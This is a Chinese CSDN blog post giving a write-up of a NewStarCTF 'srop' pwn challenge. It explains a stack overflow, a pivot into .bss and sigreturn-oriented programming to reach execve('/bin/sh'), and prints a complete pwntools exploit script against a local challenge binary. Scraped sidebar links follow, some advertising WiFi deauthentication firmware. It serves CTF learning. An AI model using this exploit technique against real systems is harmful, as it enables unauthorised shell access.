NewStatCTF--week3-pwn srop

已于 2023-11-22 20:34:23 修改
阅读量71 收藏 1
点赞数
分类专栏: pwn 文章标签: linux 学习
于 2023-10-31 23:19:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/134151586
版权

NewStatCTF–week3-pwn srop

主函数只有一个输出,一个输入,存在栈溢出

在这里插入图片描述

存在syscall函数,没有适当的可以改rdx的别提ret2csu,太麻烦了

所以用srop(而且题目就叫srop)

先改了rbp,然后跳转到主函数的这里

payload = b'A'*(0x30)+p64(bss_addr)+p64(main_addr)

在这里插入图片描述

  • 可以往下不可以往上,为什么详见上一篇的栈迁移

然后输入就相当于在bss里输入了,但为什么不用额外找leave ret呢

–因为main函数最后又有一次leave ret

然后看代码

payload=b'/bin/sh\x00'+b'A'*(0x30)+p64(pop_rdi)+p64(0xf)+p64(syscall_addr)+bytes(frame)

跳转回到了bss_addr+8的位置

也就刚好是pop_rdi,然后进行srop打execve。

至于为什么要给rsp设置一个可读的地址,看下图,需要将地址为rsp+8位置存的数据赋给r9,如果不可读的话,就会访问错误。
在这里插入图片描述

总结:喵喵喵喵 出的太妙了

exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./pwn_1')
#p=remote('',)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

sys_addr = 0x401136
pop_rdi = 0x0000000000401203
pop_rsi_r15 = 0x0000000000401201
leave_ret = 0x401191

bss_addr = 0x404900
syscall_addr = 0x401040
main_addr = 0x401151
bin_sh = bss_addr-0x30

frame = SigreturnFrame()
frame.rdi = 59
frame.rsi = bin_sh
frame.rdx = 0
frame.rcx =0
frame.rsp= bss_addr
frame.rip =syscall_addr


payload = b'A'*(0x30)+p64(bss_addr)+p64(main_addr)
#gdb.attach(p)
sd(payload)



payload=b'/bin/sh\x00'+b'A'*(0x30)+p64(pop_rdi)+p64(0xf)+p64(syscall_addr)+bytes(frame)


gdb.attach(p)

sd(payload)


p.interactive()
XYYR-c
关注
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
LINUX】SHELL贪吃蛇
09-11 440
Show()#Mapdo;;;esacdone#Snakefor ((i=0;i++))doecho "*"done#Foodecho "0"dodoneMove();;;;esacArrayMovethenthenthenthenfithen。
navicate远程linux上的pgsql提示密码失败
记录、分享、合作、共赢
09-14 158
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
GDB的基本使用方法(之二)
相忘于江湖的专栏
09-14 497
要调试守护进程(daemon process)等已经启动的进程,或是调试陷入死循环而无法返回控制台的进程时,可以使用attach命令,形式是: (gdb) attach PID attach之后就能使用普通的gdb命令,因此可以通过print显示变量,也可以设置断点。 此外,回复程序运行一般可以使用continue命令。 确认了行为之后,需要在gdb和进程分离时使用detach命令: (gdb) detach
计算机网络30——Linux-gdb调试命令&makefile
最新发布
weixin_74681777的博客
09-14 390
在已经生成后,修改一个文件,重新执行时只会重新编译修改的文件,其余不会变。myapp是要生成的可执行文件的名字,main.c是依赖文件的名字。逐过程:next,如果调用其他函数,也不进入,直接进入下一条语句。编译时带-g为调试,带调试信息编译后的可执行文件更大。l 行号——行号的行在中间,向上向下展示10行。开始调试,断点默认停在main函数第一行。使用gdb 可执行文件名——进入调试。2、测试makefile文件(1)停在第一个断点处,开始调试。(1)准备一个main文件。如果没有修改,不会重新编译。
Linux】ldd常见问题
zclinux的博客
09-11 981
当你自己编译程序时,可以通过。
Linux: network: IPv6: ESP: UDP checksum error 一例
mzhan017的博客
09-11 390
最近遇到一个问题,操作系统的内核版本是:3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux。使用的是virtio-net虚拟网卡,设置网卡的MTU-1500,配置IP6的地址,用ESP加密UDP包,如果UDP内部数据的len是1451,发出去的包会被分片,而且发出去的包里UDP包头的checksum值是错误的。最好的方式就是从网上找是不是已知问题。升级系统到最新的版本。
Linux C | 终端设备】Linux下 tty、ttyS*、ttyAMA*、console 的区别,以及系统输出重定向(附带代码)
wkd_007的博客
09-11 975
👉本文介绍了Linux系统中,tty、ttyS*、ttyAMA*、console 的区别,以及系统输出重定向,最后给出了系统输出重定向的例子代码。
Linux 下 C/C++ 程序编译的过程
Teminator_的博客
09-08 9559
本文将介绍如何将 C/C++ 语言编写的程序转换成为处理器能够执行的二进制代码的过程,包括四个步骤:预处理()编译()汇编()链接(在此之前,首先来看一下 GCC 工具链。
Linux CTF逆向入门
YJ_12340的博客
09-11 1099
ELF文件在各种平台下都通用,ELF文件有32位版本和64位版本,其文件头内容是一样的,只不过有些成员的大小不一样。在这个二进制文件中,符号没有被剥离,因此我们可以看到函数名称,这使得它更容易理解。节表头部(Section Headers)包含了描述文件节区的信息,比如大小、偏移等,但这些对二进制文件的执行流程来说并不重要。我们先来看看 ELF 文件头,如果想详细了解,可以查看ELF的man page文档。3、我们可以查看“.rodata ”部分的偏移量,可以更好的查看这些字符。它到底循环了多少个字符?
基于Linux文件编程实现处理Excel表格的数据
sakabu的博客
09-11 1302
因为是一行一行的处理数据,有些小伙伴可能会疑惑,数据为什么不会被覆盖,为什么不会得到同样的数据?我们要知道read函数的原理,你读一个字符,文件的光标就会移动一个位置,你下次再打开这个文件,他的光标位置是不变的,除非你用lseek函数来改变光标的位置,所以我们每读一行,再加上结束符'\0'就相当于一个字符串,然后立马处理数据并且写入结果文件;下次再去读数据文件,是从上一次读的位置的下一个开始读,所以才能得到一行一行的数据。什么时候读完?
Linux | 探索 Linux 信号机制:信号的产生和自定义捕捉
LiHongyu05的博客
09-14 547
Linux 提供了signal和sigaction系统调用,允许开发者自定义信号的处理函数,即捕捉信号。// 捕捉SIGINT信号sleep(1);return 0;SIGALRM信号通常由alarm()函数产生,用于在设定的时间后通知进程。alarm()函数与SIGALRM信号alarm()函数的作用是设置一个闹钟,指定经过若干秒后系统向进程发送SIGALRM信号。此信号的默认处理行为是终止进程,但我们可以通过自定义信号处理函数来捕捉并处理SIGALRM信号。alarm()参数seconds。
Java wrapperr打包springboot项目到linux和Windows
欢迎查阅
09-14 606
测试启动就是点击App.bat 就会有信息的输出 installApp就是注册为一个windows上的一个服务。上图文件复制的地方 全部复制过去 保留自己需要的 然后去掉后缀.in。下载:linux的目前免费的 windows 64位的好像收费的。前提: 一定要有Java环境(我使用的是jdk1.8)解压的目录,然后我们新建自己的项目目录java-jsw。前面是你解压的原文件 后边是你自己建的目录路径。步骤和上面的一样 不过复制的文件不一样。下载一个社区版本的应该就够用了。需要注意的点 有Java环境。
Linux 进程1
j573749的博客
09-14 774
进程 如何查看linux中的进程 ps指令 进程状态
linux 最简单配置免密登录
qq_42250832的博客
09-14 123
需求:两台服务器互信登录需要拉起对端服务。
mqtt-pwn安装
09-20
3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值